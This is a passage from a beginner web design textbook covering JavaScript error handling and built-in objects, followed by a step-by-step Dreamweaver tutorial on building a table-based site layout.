So please note that when IF statement is use in JavaScript the right comparison operator should be 

“==”. 

 

Syntax error: this type of error is cause when you violate the syntax rule, that’s when you use syntax 

wrongly, this normally cause your web browser not to execute your script, leaving you with a blank 

screen (except for internet explorer that shows us where and the cause of the error). Let’s look at 

some common syntax errors. 
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Line with error Course of the error Correct line 

var name=”Ben” Omission of the semi-color terminator var name=”Ben”; 

allert(“Welcome”); This is assume, that the programmer 

wanted to use the alert() object.  

alert(“Welcome”); 

var 1num; Wrong variable name, variable name 

can’t begin with a number. 

var num1; 

 

As I said earlier I personally think JavaScript debugging is easier in with Internet explorer web 

browser (As discussed in earlier, see: Tip on JavaScript debugging) however if this feature is not 

enabled by default (although it should) or else is turned off, you can enable it yourself see step 

below. 

1. Open or launch Internet explorer. 

2. Click on “Tools” on its menu bar  

Note: if the menu bar is not showing as common with recent Internet explorer browser, hit 

the Alt key on your keyboard. 

3. Click “Internet Options” from the drop-down list. 
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4. Now the “Internet Options” dialogue box will appear, Click the “Advanced” tab at the top of 
the dialogue box 

5. On the “Browsing” section, locate and check (click) “Display a notification about every script 
error” and  click the OK button. 
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Next time you execute a page that has JavaScript error, Internet Explorer error alert box will pop-up, 

if the error detail did not show you may have to click the “Show detail” button.  

 

 

 

Try…Catch statement 
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However when it come to error-handling it programming both in JavaScript, PHP, .NET or Java, it is 

advice you write your important or key program within the try…catch block so that you can easily 

catch and report error within the program.  

The try…Catch are use together. The try block contains the code to be run, while the catch block 

contains the code to be executed if an error occurs. 

Another importance of using Try…Catch is that it can be very helpful in reporting error with web 

browsers that does not have the capability to report scripting error like Internet explorer. 

Below is an example to demonstrate Try…Catch statement. 

<html> 

<head> 

<title>Try...Catch</title> 

</head> 

<body> 

<script type="text/javascript"> 

var msg; 

try   { 

  allert("Welcome user!") 

} 

catch(msg) { 

    msg ="ERROR FOUND: " + msg.description;   

    document.write(msg); 

} 

</script> 

</body> 

</html> 

The Try…Catch sample above is quite self explanatory, within the Try block there is an object 

mistypes allert() instead of alert(), therefore the Catch block will be executed to report the error. 

Below is the screenshot. 

Internet explorer 

 

Result In Opera and Firefox 
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This is better than a blank screen, even thought is not detail or specific. 

 

The onerror event handler 

Another option is to use the onerror event handler to report error, Please note that the onerror 

must be in lowercase else it won’t work, for this reason OnError, onError or ONERROR in wrong 

Below is a sample program where onerror is use to report error. 

<html> 

<head> 

<title>onerror</title> 

</head> 

<script language="JavaScript" TYPE="Text/JavaScript"> 

function ErrorReport(msg,url,lineNum) { 

       alert("Error description: " + msg + "\nEffected Line: " + 

lineNum +  

             "\nPage URL: " + url); 

} 

onerror = ErrorReport; 

</script> 

</head> 

<body>  

<script language="JavaScript" TYPE="Text/JavaScript"> 

          // I omitted the closing ); in the line below 

          document.write("Welcome"   

</script> 

</body> 

</html> 

 

In this example we define a function named ErrorReport  with three parameters 

ErrorReport(msg,url,lineNum), which are actually the three parameter required by the onerror event 

handler. The ErrorTrap() function then have the alert box displayed the error message when the 

function is called in line onerror = ErrorTrap. I you look at the script in the <body> we actually made 

a mistake by note using the document.write() properly document.write("Welcome"  this mean the 

error message will pop-up.  

This works in my Internet explorer and Firebox but not Opera 

Internet explorer 
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Mozilla Firefox 

 

 

Using Objects 
Object oriented programming OOP has not only being hyped in the new era of programming 

language design that almost all new programming language being design will be questioned if it is 

not fully OOP such as Smalltalk, C#, Python, VB.NET, Java and many more, even older languages and 

language that is not initially OO compliant, such as PHP and Perl is quickly taking OOP seriously as 

you must have known in the IT field things change faster than you never expect, I started with BASIC, 

then I learnt ASP and VB, but when Microsoft Development  Technology are being questioned mainly 

because it is not fully Object Oriented among many other complained Microsoft took a bold step to 

Introduced .NET which is a new technology designed to bright Microsoft enthusiastic developers to 

continue to trust Microsoft, Bill Gates personally spearhead this project and within a short time .NET 

with its new array of languages such as VB.NET, C# and others quickly rise to compete with the very 

popular Sun Java, now owned by Oracle corporation. While all the skeptical moves are being done, 

just like many other Microsoft developer I quickly switch to PHP, Python and Java, but immediately 

.NET is stabilized, it becomes so attractive once more. 
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Anyway the bottom line is that OOP can be very handy and productive to experience programmers 

and it is not a starting point for beginner. Although JavaScript permit us to create our own Object or 

Class, however I will not like to distract us with the many terms and design methodology of OOP in 

this book.  

You be wondering “so why mention Object if we are not going to treat the topic now?”, The answer 

to this question is that, JavaScript comes with a lot of important build-in object which I think we 

should look at, such as Math, Number, Array, Boolean, Date, and String objects.  

 

Date Object 
The date object is use to insert current date and time function into our program. Moreover you must 

understand that the date information is collected from your Operating systems, therefore if the date 

you are seeing is not current then you need to set your system date and time from the control panel. 

Date information is based on the number of millions of seconds that have passed since January 01, 

1970 and the time span, 00:00:00 Universal Time (UTC) with a day containing 86,400,000 

milliseconds. 

To create the date object you are required to use new keyword follow by the Date constructor  

new Date(); which creates the date object with the default constructor.  

If you run this program and output its result document.write(new Date()); the result you would see 

will look like the line below. 

Internet explorer 

 

In Opera and Firefox 

 

As you can see, the default result from the Date object follow this order, day of the week “Wed”, the 

month ”Jul”, year “2012” then the current time, the offset from GMT time and finally time-zone 

information. 

We may also choose to streamline date and time result, instead of having all the detail from the 

default Date() constructor. You can achieve this by calling the Date method. See the table below. 

Date Methods Description Example  

from the current date and time from the 

above line 

Range 

getFullYear() Reruns the current 

year 

2012  
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getMonth() Reruns the current 

month 

6 (July), note: because the range start from 

0-11, that is why July is 6 and not 7. 

0 to 11 

getDate() Reruns the current 

date 

11 1 to 31 

getHours() Reruns the current 

hour 

13 (GMT) same as 1pm Nigerian time. 0 to 23 

getMinutes() Reruns the current 

minute 

51 0 to 59 

getSeconds() Reruns the current 

seconds 

56 0 to 59 

getDay() Reruns the current 

date 

3 (Wednesday) 0 to 6 

 

With the understanding of the Date methods you can request the methods needed to create your 

date or time in the format you like, Like the example below display the date in this format “Date / 

Month / Year” 

<html> 

<head> 

</head> 

<title>Formatted Date</title> 

<body> 

<script language="javascript" type="text/javascript"> 

var MyDate = new Date(); 

var onlyDate = MyDate.getDate(); 

var onlyMonth = MyDate.getMonth() + 1; 

var onlyYear = MyDate.getFullYear(); 

var formattedDate = onlyDate + "/" + onlyMonth + "/" + onlyYear; 

document.write(formattedDate); 

</script> 

</body> 

</html> 

 

Please note that because getMonth range is between 0-11, contrary to the 1-12 month we are use 

to that is my I added 1 to the month MyDate.getMonth() + 1;  



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

152 

 

Math Object 
Math Object allows us to carry out mathematical operations with ease, the JavaScript math object is 

very rich with numerous functions which we can use, below is a table containing some common 

properties and methods of JavaScript math object. 

JavaScript has 8 main Constants or Properties and they are: 

Constants or Property Meaning Result 

E Euler's constant 2.718281828459045 

PI Ratio of circumference of a circle to its diameter 3.141592653589793 

SQRT2 Square root of 2 1.4142135623730951 

SQRT1_2 Square root of ? 0.7071067811865476 

LN2 Natural logarithm of 2 0.6931471805599453 

LN10 Natural logarithm of 10 2.302585092994046 

LOG2E Base 2 logarithm of E 1.4426950408889633 

LOG10E Base 10 logarithm of 10 0.4342944819032518 

Each of this properties or constant can be access using Math.PropertyName, for example  

<script language="javascript" type="text/javascript"> 

     var ans = Math.SQRT2; 

     document.write(ans); 

</script> 

 

 

 

Now let’s see some the Math functions or methods. 

Functions and method Meaning Description 

min(a,b) Minimum Returns either a or b, depending on which is 

lower 

max(a,b) Maximum Returns either a or b, depending on which is 
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higher 

pow(a,b) Power Raise A to the power of B 

random() Random Returns a random numbers 

round() Round Rounds the argument which could be a number 

with decimal (float) to the nearest whole 

number (integer) 

sqrt() Square root Returns the square of the argument or 

parameter 

abs() Absolute Returns the absolute value without the decimal 

cos() Cosine Return Cosine trigonometric functions 

sin() Sin Return the Sin of the argument 

tan() Tangent Return the Tangent of its argument 

exp() Exponential Return the exponential of its argument 

log() Logarithms Return the Logarithms of its argument 

 

The example below demonstrate the use of the pow() method, the result should be 5 raise to the 

power of 3. 

<script language="javascript" type="text/javascript"> 

var ans = Math.pow(5,3); 

document.write(ans); 

</script> 

 

 

String Object 
The String object operates on piece of text or string in programming, below is some popular string 

property and methods. I said “property” because JavaScript actually have one major string property 

and with many methods.  
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Property 

Length Return the number of letters or characters contained the String. 

Note: the length property count both the space within the string 

Methods 

toUppercase() Convert the string to uppercase letter 

toLowerCase() Convert the string to lowercase letter 

substring() Returns some specified part or token of the string. 

charAt() Returns the letter at the specified position in the string where the index of 

a String object begins at zero 

concat() Use to concatenate or combines two strings into one string. 

indexOf() Returns the position of a specified substring 

 

The example below shows us how to use almost all the methods and property of the String Object. 

<html> 

<head> 

</head> 

<title>String Object</title> 

<body> 

<p> 

<script language="javascript" type="text/javascript">  

 

String1 = "The Grace of GOD"; 

String2 = "Is Sufficient"; 

String3 = "For Every Thirsty Souls Out There"; 

 

document.write("String1: " + String1 +"<br />"); 

document.write("String2: " + String2 +"<br />"); 

document.write("String3: " + String3 +"<br /><br />"); 

// substring to retrieve race from String1 

document.write("String1.substring(5,9) = " + String1.substring(5,9) 

+"<br /><br />"); 

// Convert String1 to UPPERCASE 

document.write("String1.toUpperCase() = " + String1.toUpperCase() 

+"<br /><br />"); 
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// Convert String 2 and 3 to lowercase 

document.write("String2.toLowerCase() = " + String2.toLowerCase() 

+"<br />"); 

document.write("String3.toLowerCase() = " + String3.toLowerCase() 

+"<br /><br />"); 

//Return number of characters in String1 

document.write("String1.length = " + String1.length +"<br /> 

<br />"); 

//Concatenate the three Strings, using the concat() method 

String4 = String1.concat(String2.concat(String3)); 

document.write("The concatenated strings = " + String4); 

</script> 

</p> 

</body> 

</html> 

 

Array Object 
Actually we have two main types of variables in programming the first variable discussed earlier is 

called scalar variable and array variable.  

An array is a unique variable which can hold more than one value by using an indexed list to refer to 

its values. 

Array is more efficient that an ordinary variable when you want to store and manage list of items 

easily, below is an array property and method. 

Array Object property and method 

Property 
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length Return the size of the array 

Method 

sort() Arrange or sort the value of the array 

 

Below is a simple use of array that stores some names of higher institutions in Nigeria. 

var schools=new Array(); 

schools[0]="Yaba College of Technology";  

schools[1]="University Of Ibadan"; 

schools[2]="Institute of Manage and Technology"; 

schools[3]="Nnamdi Azikiwe University"; 

schools[4]="Ahmadu Bello University"; 

schools[5]="Lagos State University"; 

schools[6]="Kaduna State Polytechnic"; 

schools[7]="Obafemi Awolowo University"; 

schools[8]="University of Nigeria"; 

schools[9]="University of Lagos"; 

schools[10]="Moshood Abiola Polytechnic"; 

Once you have the data available like the name of the Institutions above, you can then access any of 

the array data by referring to the name of the array and the index number. For example 

document.write(schools[0]); Will display: “Yaba College of Technology” 

Array is often use with loop statement  to make it easy to manage it, for example instead writing ten 

lines of code to display all the array values above I can just write few line of loop to do the work 

easily, see example below. 

<html> 

<head> 

</head> 

<title>Array Object</title> 

<body> 

<p> 

 

<script language="javascript" type="text/javascript">  

 

var schools=new Array(); 

 

schools[0]="Yaba College of Technology";  

schools[1]="University Of Ibadan"; 

schools[2]="Institute of Manage and Technology"; 

schools[3]="Nnamdi Azikiwe University"; 

schools[4]="Ahmadu Bello University"; 

schools[5]="Lagos State University"; 

schools[6]="Kaduna State Polytechnic"; 

schools[7]="Obafemi Awolowo University"; 

schools[8]="University of Nigeria"; 
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schools[9]="University of Lagos"; 

schools[10]="Moshood Abiola Polytechnic"; 

 

arraySize = schools.length; 

document.write("Number of school is the array: "+arraySize+"<br 

/><br />"); 

for (var n = 0; n < arraySize; n++) { 

        document.write(schools[n], "<br />"); 

} 

//sort the array 

document.write("<br /><br /> ASCENDING ORDER = " + schools.sort()); 

</script> 

</p> 

</body> 

</html> 

After the storing section of the array program above, the next line call the length property for the 

number of elements in the array, which was also use to set the limit of maximum for the for loop 

statement, as you can see how handy loop can be when working with array. See the browser view 

below. 

 

Below is another interesting and interactive example of array. This example requests you to enter 

your favourite players. 

<html> 

<head> 

</head> 

<title>Players Array</title> 
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<body> 

<p> 

<script language="javascript" type="text/javascript">  

var NumPlayers = prompt('How many players are your favourite',''); 

//Aray number is set 

PlayerArray = new Array(NumPlayers); 

// ask user to enter the array value 

for (var n = 1; n < NumPlayers; n++) { 

        var PlayerName = prompt('Enter player: '+ var); 

        PlayerArray[n] = PlayerName;    

} 

// display all the values of the array 

document.write("YOUR " + NumPlayers + " FAVOURITE PLAYERS ARE: <br 

/>"); 

for (var y = 0; y < NumPlayers; y++) {  

        document.write(PlayerArray[y], "<br />"); 

} 

</script> 

</p> 

</body> 

</html> 

This example starts by asking “How many players are your favourite”  

var NumPlayers = prompt('How many players are your favourite',''); 

see the screenshot below.  

 

For example I entered 3 and click the OK button, this number will be using to create an array object 

with 3 elements. playerarray = new array(numplayers); 

Then you will be prompted three times to supply the names of each players, this values are stored 

into each area elements respectively. 
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for (var n = 1; n <= NumPlayers; n++) { 

        var PlayerName = prompt('Enter player: '+ n); 

        PlayerArray[n] = PlayerName;  

} 

  

 

As you enter each name and click the OK button 

the next prompt box will appear 

The remaining of the program actually use the second for loop statement to display the values of the 

array object. 

for (var y = 0; y < NumPlayers; y++) { 

        document.write(PlayerArray[y], "<br />"); 

} 

   

As said earlier, JavaScript remains the most important scripting language for implement client-side 

web application, as many recent technology and framework dependence heavily on JavaScript such 

as AJAX, JQuery,Node.js,  Modernizr, Knockoutjs just to mention few, so if you are not using raw 
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JavaScript, your knowledge of the scripting language will still be very useful as you advance in your 

career as we professional web developer, so I urge you to keep learning and growing! 
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CHAPTER 3 

USING DREAMWEAVER TO CREATE A WEBSITE 
 

Dreamweaver is a professional web authoring tool for designing, coding, and developing websites 

and web applications. Whether you enjoy hand-coding or prefer to work in a visual (WYSIWYG: What 

You See Is What You Get) environment, Dreamweaver provides you with helpful feature to enhance 

your web creation experience. 

The visual editing features in Dreamweaver let you rapidly create web pages without writing a line of 

code. You can view all your site elements and drag them from an easy-to-use panel directly into a 

page. You can design and optimize your image in graphics application such as Fireworks or create 

that Flash animation and import them directly into Dreamweaver.  

In addition to drag-and-drop features that help you build web pages, Dreamweaver also provides full 

support for coding environment which includes code-editing features such as code coloring, code 

collapse, a coding toolbar, and tag completion with language reference material on CSS, JavaScript 

and HTML.  

Dreamweaver also allow you build server-side database-driven web applications using its server 

component, however I will advise you to hand-code your PHP in Dreamweaver instead of using this 

built-in components (we will learn PHP programming later in this book) likewise though 

Dreamweaver can handle ASP.NET; I think ASP.NET, C#, VB.NET or any .NET related development is 

better done using Microsoft Visual Studio IDE (Integrated Development Environment) while JSP (Java 

Server Pages; Java technology for rapidly building web application similar to PHP) can be done in 

Dreamweaver, but when building large Java enterprise application I will rather go for Java IDE such 

as Netbeans or Eclipse.  

Regardless of the few shortcomings of Dreamweaver, its strength is in its flexibility and rich 

environment it gives web designer as well as programmer or developer to embed their script into 

HTML which actually leads to rapidly development most especially when the job of design as well as 

programming is being done by one person. 

I am a big user of Dreamweaver and I will share with you in this chapter some of the useful and cool 

things Dreamweaver can help you to achieve, without boring you with all the screw and bolts, as I 

said Dreamweaver power is in design but you must learn, understand and hand-code your program 

most especially PHP or JavaScript with it. 

Creating a new website 
Creating a new website doesn’t often start with you launching Dreamweaver even though you are 

an experience web designer or developer, you still have to understand the requirement of your 

client or the scope of the project, then plan / design (do the paper work - Information architecture) 

before using the computer. 
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In order to keep this book focus on this topic (Dreamweaver) I would like you to see my sample IT 

discussion site, ICTng at www.bengallery.com/ictng because we will be building a prototype of 

it in this chapter. 

 

The first step is to know what the project is all about 

ICTng is an abbreviation. ICT means Information and Communication Technology while ng stand for 

Nigeria (my beloved country) so ICTng is a project meant to: 

1. Keep visitor updated by latest IT news 

2. Provide materials for IT professionals  and developer 

3. Serve as a medium for discussing IT related matters as it concern the Nigerian society. 

Below is a screenshot of the version of the website we will be creating. 

 

 

Although most of the information present on the ICTng website online is actually retrieved from a 

database but in this example we are going to design the static version of the website rather than 

database-driven way (we will discuss PHP and MySQL later in this book).  

With this few detail I think we are good to go, just start Dreamweaver, click Start > Programs > 

Macromedia > Dreamweaver 8. The screen should look like the preview below. 

http://www.bengallery.net/ictng
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Setting up or defining a new website 

Step1. Click “Site” on the Dreamweaver menu bar. 

Step2. Click “New Site…” from the dropdown. See the screenshot below. 

 

The “Site definition” dialogue box will appear, as shown below. 

Step3. Click the “Advanced” tab on the dialogue box, to switch from “Basic” to “Advanced” (if it not 

already in Advanced) and click “Local Info” in the “Categories” section. See what it looks like below.  
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Step4. Type “ICTng Project” for the Site name 

Step5. Type “C:\ictng” for the Local root folder 

Step6. Click the Ok button and click “Done” on the box that follows. 

See the screenshot below. 
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That is all we need to setup our new website project, the Dreamweaver screen should now look the 

one below, please see the right site “Files” panel. 

 

Note that “C:\ictng” actually created a folder called “ictng” on the root of your drive C:, remember 

that a website is just a folder and until it contain files or webpage it is useless. So let’s proceed to 

creating webpage for this new website. 
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Creating webpage 
Continuing from the last exercise 

Step1. Click “File” menu on the Dreamweaver menu bar. 

Step2. Click “New…” from the dropdown  

 

…and the “New document” dialogue box will appear. 

 

Step3. As you can see in the screenshot above, ensure that “Basic page” is selected in Category 

section and “HTML” is selected in the Basic page sub-section. 
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Step4. Finally click the Create button. 

This will create a new but unsaved HTML webpage “Untitled-1”. 

 

Please note the Website info, at the files panel where the red arrow is pointing, below is a closer 

look. 

 

It contain the name and location of our website, we are going to save the new webpage we've 

created and come back to see the change here. 
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Saving the webpage 
Step1. Click “File” menu on the Dreamweaver menu bar. 

Step2. Click “Save As…” from the dropdown and the “Save As” dialogue box will appear. 

Step3. As you can see in the screenshot below, in the “Save in” box shows “ictng” folder, meaning 

that the default location where the webpage will be saved is inside our ICTng website folder, if this is 

not the location you are seeing then use the selection list to browse and select the folder from your 

drive C: 

Step4. Type “index” as the File name, remember index means that it is going to be our “Homepage”. 

 Step5. Then click the Save button. See the screenshot below. 

 

Now let’s see the effect of this in the Files panel as we promise. 
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…as you can see the file “index.html” now appear in the “Files panel”.  

 

Dreamweaver views 

We can start designing the layout for this page, but before then we need to quickly understand the 

different type views in Dreamweaver. 

Dreamweaver has three types of views which are Code, Split and Design 

Design view: which is always the default view as you can see from our last exercise;, this view gives 

you the power to use the visual WYSIWYG (What You See Is What You Get) design environment to 

rapidly design your website without having to code every piece of your HTML, as you know it is only 

necessary you understands HTML because some job can be better done by hand-coding for example 

embedding HTML into script or vice versa. 

Note that every design or development done in design view generates codes which can be seen in 

Code view.  

Code view: This view allow web programmer or developer to have access to the rich coding 

environment which includes code coloring, code collapse, a coding toolbar, and tag completion.  

Split view: This allows you to view both design and code environment at the same time.  

To see our ICTng project in these three views, first ensure that the index.html page is open (if it not 

open already); by default this page should be in design view, as you have seen earlier. 

This can easily be done by clicking any of the three views from the “document bar” (see the 

screenshot below)  
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.. or from the menu bar View > Code or Design or Code and Design, see the screenshot below.  

 

Below is what the code view of our page looks like. 

 

With your knowledge of HTML I believe you can understand now that Dreamweaver has already 

started to taken care of the HTML work, so any little things you do in the design view View > Design 

you can switch to code view again to see the code being generated. You can also see the split view 

View > Code and Design   
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Webpage Title 
Now let us change the default title “Untitled Document” of the webpage to a meaningful one 

befitting our ICTng website project, from the “Document bar” change the title from the default 

“Untitled Document” to the new “ICTng Information Technology News and Articles”.  

 

 

 

Saved changes  

Immediately you click outside of the title box, (let’s say on the blank area of the page) after 

renaming the page title, you will notice an asterisk (*) in front of the filename “index.html” right 

above the document bar, see the screenshot below. 

 

This signifies that the recent change done to the page, is yet to be saved. 

So to save the change from the menu bar click File > Save or use a shortcut CTRL+S  
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Page background color 
In the ICTng homepage (shown above) you would notice that it has a light green colour. 

The reason for using the ICTng project for our example is to encourage us to learn 

Dreamweaver by applying each feature as you learn it, this is the best way I thought I can 

teach technology related topic by making it interesting and interactive. 

Now let us learn how we can also apply this background colour to our own version of ICTng, please 

understand that you can stretch your creative ability by practicing with more examples than the one 

we a presently using. 

 

Step1. Click anywhere within the index.html page we created earlier. 

Stept2. Click “Page Properties…” button on the Properties bar, below the Dreamweaver window. 

 

Step3. The Page Properties dialogue box will appear, so type the colour code “#E3EDE4” into the 

“Background color” textbox, see the screenshot below. 

 

Note: you can also choose color from the colour picker  in front of the Background color. 

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

173 

 

Step4. Click the “OK” button, our index.html page will look like the screenshot below 

 

We can now continue with the page layout. 

 

 

 

Page layout using table 
Page layout is the backbone behind the design of a webpage, for example the layout will determines 

where our logo will be, the navigation links, text and images. 

The layout held almost all the content of a webpage together so that they don’t fall apart or look 

unorganized. Before we start creating the layout, below is what the layout design of our ICTng 

website would look like. 
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Navigation links 

Logo here 

 IT Discussion 

IT news ICT Discussion 

Our Contact 

Feedback 

 

Footer 

 

Now we will create this layout on our index.html. Please ensure that the page is open, assuming you 

have closed Dreamweaver, reach to the program Start > Programs > Macromedia > Dreamweaver 

8, you will see your website on the file panel.  

Your website being the last website we worked on should appear on the File panel,   but incase if it 

doesn’t (this could happens when you have more than your website created in Dreamweaver and 

our ICTng  happen not to be the last one we worked on) click the Files dropdown and select your  

website  

 

So you can now double-click on our page index.html from our website. 

Note: web layout can be done using div or table, in this example we will be using a table. 

There is nothing complex about the layout design, as you we will see soon, we are going to create 

and modify table in Dreamweaver to achieve this, see the steps below. 
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Inserting table    

1. With the page still open, from the menu bar, click Insert > Table, the table dialogue box will 

appear. 

2. For number of rows enter 3  

3. For number of columns enter 3 

4. Set table width to 90 for and choose percent, instead of pixels. 

5. Set Border thickness to 0, to makes the border to be invisible. 

6. Set Cell spacing to 0 

6. Finally click the OK button. 

The settings you made should look like the screenshot below. 

 

The table should appear as we have below 
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Save the changes made to this web page, now let’s modify the table to suite the layout design we 

want. The first modification we will be doing is to merge the first rows to one; this is where our 

navigations link would be. 

Merge cells 

Step1.Highlight or select the first row of cells by placing your cursor in either far left or far right cell 

and dragging to the other side. If you are having challenges selecting the cells like this, you can try 

holding the control key (Ctrl) and clicking each cells, after clicking the three cells you can now release 

the Ctrl key. 

 

Step2. From the menu bar click Modify > Table > Merge Cells 

 

Please try to take note of the shortcuts from the menu, to merge cells it is Ctrl+Alt+M.  

With the cell merged the table should look like the one below. 
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Please apply the same step to merge the cells in the last or bottom rows; this will leave the table 

looking like the one below. 

 

You can now save the changes made to the webpage. 

Even with these modifications you can still notice that we are not yet done; perhaps the next change 

would make a difference. Now let us adjust some cells in the table. 

 

Adjust cells 

Move your mouse to the second to last line, see the screenshot below. 

 

Note the change in the mouse pointer, this means that you can adjust the line of the cell either up or 

down, so click, hold the mouse key and drag the cell down, after you release the mouse button, the 

screenshot should look like the one below. 
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Please note that adjusting this table is similar to doing it in MS Word., so if you are unable to adjust 

it properly you may as well switch to code view (view > Code) and paste the HTML code below to 

achieve it. 

<html> 

<head> 

<title>ICTng Information Technology News and Articles</title> 

</head> 

<body bgcolor="#E3EDE4"> 

<table width="90%" border="0" cellspacing="0"> 

  <tr> 

    <td colspan="3">&nbsp;</td> 

  </tr> 

  <tr> 

    <td height="400">&nbsp;</td> 

    <td>&nbsp;</td> 

    <td>&nbsp;</td> 

  </tr> 

  <tr> 

    <td colspan="3">&nbsp;</td> 

  </tr> 

</table> 
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</body> 

</html> 

 

Now we are going to colour or add background colour to our table, so that it can start to have the 

look of the ICTng website we are trying to create 

 

Table Formatting 

Step1. Click inside the first cell at the loop of the table, your cursor should be blinking inside the cell 

when this is done. See the location from the screenshot below.  

 

Step2. Locate the background colour (Bg) in the properties, see the screenshot below. 

 

Just like the “Background color” you can type in the colour code directly or you use the “Bg” colour 

picker (the tiny box) in front of the “Bg” to select white from the palette. See the screenshot 

below to how the palette will look like. 
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Please note while choosing colour from the palette that the colour code also appear at the top of the 

palette as soon as you mouse reach to a particular color, since white was the color picked in our 

example you can see the colour code for white #FFFFFF appearing on top of the palette in the 

screenshot above. 

After choosing white your web page should now look like the screenshot below. 

 

You should use this step to apply the same color to the three other cells, by clicking on them and 

choosing white for their background color, except for the center cell. The end-result should look like 

the screenshot below.  

Please note that the text and arrow is for illustration purpose. 
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Notice that when you click either of the three cells with height as show above (1st, 2nd or 3rd cell), 

the cursor is positioned at the left side and at the middle of the cell which is the default location, this 

may not suit our need, as shown below, when I type my name it appears at the middle of the cell 

instead of the top as expected. 
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So let’s learn how to change the input position of a cell, this is called alignment and we have two 

major types of alignment in Dreamweaver, each of the two now has three type of alignment each, 

see the illustration below to understand what I mean. 

Cell alignment 

1. HORIZONTAL: Left(Default), Center and Right 

2. VERTICAL: Top, Middle(Default), Bottom 

To set any of this alignment: 

1. Click inside the cell you want to align 

2. Select any of the alignment from the properties bar below the Dreamweaver window, as shown in 

the screenshot below. 

 

Click the Horz (Horizontal) or Vert (Vertical) and change it from Default to your desire alignment 

position. 

 

Now let’s align each of the three cells and align them to the top, as we prepare to add content to 

them. 

Align to top: with your cursor still positioned and still blinking in the third or left cell, see the 

screenshot below (I've deleted the text I type earlier). 
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Choose “top” from the “Vert” drop-down you will now see the cursor at the top of the cell. 

 

Please do the same to the first and second cell as well, don’t forget to click inside of each of them 

before choosing “Top” from the “Vert” drop-down.  
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Note: when doing this your table cell may shift unusually, this is because the cell width was not set, 

if this happen try and readjust it to look like what we have above. 

Now we are going to add another table inside the 3rd or right cell, this is called nested table, this 

new table will have one column and three rows. This will help us to achieve the layout design we 

need. 

 

Nesting the table 

Step1. Click inside the 3rd cell as we've done earlier. With the cursor at the top of the cell, you can 

now add or insert the new table.  

Click Insert > Table and set the Rows to 3 and Column to 1 also ensure that Table width remains 100 

percent and border 0 if it is not already set, the table dialogue box should look like the screenshot 

below.  
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So you can click the “Ok” button, to have the new table inside the cell, this should look like the 

screenshot below. 
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You must have notice that the new table also needs some few adjustments, just like the way we had 

adjusted the first one, click and drag each of the three cells downward as shown in the screenshot 

below. 

 

Note: The final result should look like the one below. 
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If you are finding it difficult to achieve this you can as well switch to the code view and replace some 

or all the code with the one below. 

<html> 

<head> 

<title>ICTng Information Technology News and Articles</title> 

</head> 

<body bgcolor="#E3EDE4"> 

<table width="90%" border="0" cellspacing="0"> 

  <tr> 

    <td colspan="3" bgcolor="#FFFFFF">&nbsp;</td> 

  </tr> 

  <tr> 

    <td width="29%" height="400" valign="top" bgcolor="#FFFFFF">&nbsp;</td> 

    <td width="40%" valign="top">&nbsp;</td> 

    <td width="31%" valign="top" bgcolor="#FFFFFF"> 

     <table width="100%" border="0" cellspacing="3" cellpadding="0"> 

      <tr> 

        <td height="119" valign="top">&nbsp;</td> 

      </tr> 

      <tr> 

        <td height="127" valign="top">&nbsp;</td> 

      </tr> 

      <tr> 

        <td height="139" valign="top">&nbsp;</td> 
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        </tr> 

    </table> 

   </td> 

  </tr> 

  <tr> 

    <td colspan="3" bgcolor="#FFFFFF">&nbsp;</td> 

  </tr> 

</table> 

</body> 

</html> 

Don't also forget to click inside each of the three cells of the newly tested table and align them to 

top.  

Table Alignment 

Before we celebrate our completion of the layout there is one more thing we need do to the layout, 

which is to align or position it (the entire layout-table) to the center, see the illustration below by 

default (currently) the layout is positioned to the left. 

 

To align the table to center, we will start by selecting the main or first table. 

Step1. Click anywhere inside the table. Please note the tag guide, below the screen. 
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Click the <table> tag just after the <body> tag, the table will be selected, as you can see the black 

border indicating that the table selection. 

 

Step2. Click the Align button drop down, in the properties bar just below your screen. See 

screenshot below. 

 

And choose Center, from the list. This will align the table or let’s say out layout to the center; this 

should now look like the one below. 
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Please save the page now if you've not done so already. 

The skill we acquire while creating the layout of this webpage includes as creating, modifying, 

aligning, text aligning and formatting table in Dreamweaver, beside I think every curious and creative 

web designer, permit me to call you that; won’t stop in this exercise but will explore by designer 

more attractive layout design and even play with more colours. 

You can choose to have some cold drink and relax a bit before continuing with the next exercise. 

 

Adding content to the webpage 
As mentioned earlier the content of ICTng www.bengallery.com/ictng  is retrieved from a database 

(dynamic) this include the text and well as the images and to reproduce the exact content in our 

(static) design, might be difficult for a starter, so we will try to ignore some feature to make this 

exercise as simple as possible. 

The screenshot below is the reminder of what the scaled-down version of the ICTng project we are 

working on looks like once again. 

http://www.bengallery.net/ictng
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Let’s start with the “IT Professionals” column, first with the logo. 

 

Adding image or picture to web 
Images are no doubt very essential part of web design, it gives 

beauty and life into web experience, as a result creative or graphic 

design skill can’t be separated from web design. Some of the uses 

of graphic in web design include logo, button, banner and others. 

We are going to learn how to add image to our web page, the 

image will be the ICTng logo just above the, as shown in the right 

screenshot. 

The image folder: It is always better to keep images in another 

folder inside your website, This will help us to keep things 

organize. 

Please minimize Dreamweaver, so that we can get the logo into 

the location of our website folder. 

 

 

Step1. Open you website (folder) from the location C:\ICTng 

Tip: From the Desktop, Double-Click My Computer, Double-Click C: and Double-the folder ICTng  
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Your website should contain only the “index.html” page as should in the screenshot above, now we 

are going to create a folder name “images” inside this ICTng folder, the images folder will contain all 

the images we will be using for this project. 

Step3. Right-click on the empty space beside the index page, point to new  then click folder  

 

Step4. The folder will be created as “New Folder”, then rename to “images” before reselecting. 

Now you should have two items on your website just as the screenshot below. 
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Step5. Now open the “images” folder by double-clicking on it, the next step will tell you were to get 

the ICTng logo from the Internet, in case you don't have Internet connection you can use any other 

picture or images to practice this exercise. 

Step6. Log on to www.bengallery.com/webbook/web.zip  to download the ZIP folder containing the 

image and other files. Unzip the folder and copy all the files in it, including “ictng_logo” (the full 

name of the file should be “ictng_logo.jpg”, .jpg which is the file extension may not hidden on your 

computer). 

Step7. Paste the copied files into the “images” folder we created earlier, your images folder should 

now look like. 

 

Step8. Return to Dreamweaver and ensure that our index.html web page we've been working on is 

open in Dreamweaver 

Note: the file panel should now show the new “images” folder and when you expand it you will see 

the logo “ictng_logo.jpg” and well as the other files. See the preview below 

http://www.bengallery.net/webbook/web.zip
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As you can see (after expanding the images folder) the three files it contains of which two is a .JPG 

image files while the other one is .CSS style file) 

Step9. Click this location of the index.html web page, as show in the screenshot; this is where the 

logo will be placed. 
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Step10. Click on the menu bar Insert > Image 

 

 

